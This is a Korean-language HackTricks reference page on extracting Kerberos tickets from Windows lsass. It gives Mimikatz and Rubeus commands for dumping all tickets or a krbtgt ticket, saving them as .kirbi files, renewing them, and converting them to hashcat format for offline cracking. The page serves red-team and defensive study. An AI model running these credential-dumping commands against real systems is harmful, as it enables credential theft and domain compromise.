4.2 KiB
Windows에서 티켓 수집하기
{% hint style="success" %}
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
Windows의 티켓은 보안 정책을 처리하는 lsass (로컬 보안 권한 하위 시스템 서비스) 프로세스에 의해 관리되고 저장됩니다. 이러한 티켓을 추출하려면 lsass 프로세스와 인터페이스해야 합니다. 비관리 사용자만 자신의 티켓에 접근할 수 있으며, 관리자는 시스템의 모든 티켓을 추출할 수 있는 권한을 가집니다. 이러한 작업을 위해 Mimikatz와 Rubeus 도구가 널리 사용되며, 각각 다양한 명령과 기능을 제공합니다.
Mimikatz
Mimikatz는 Windows 보안과 상호작용할 수 있는 다목적 도구입니다. 티켓 추출뿐만 아니라 다양한 보안 관련 작업에도 사용됩니다.
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
Rubeus
Rubeus는 Kerberos 상호작용 및 조작을 위해 특별히 설계된 도구입니다. 티켓 추출 및 처리뿐만 아니라 기타 Kerberos 관련 활동에 사용됩니다.
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Listing all tickets
.\Rubeus.exe triage
# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
이 명령어를 사용할 때는 <BASE64_TICKET>
및 <luid>
와 같은 자리 표시자를 실제 Base64 인코딩된 티켓 및 로그온 ID로 각각 교체해야 합니다. 이러한 도구는 티켓 관리 및 Windows의 보안 메커니즘과 상호 작용하는 데 광범위한 기능을 제공합니다.
References
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.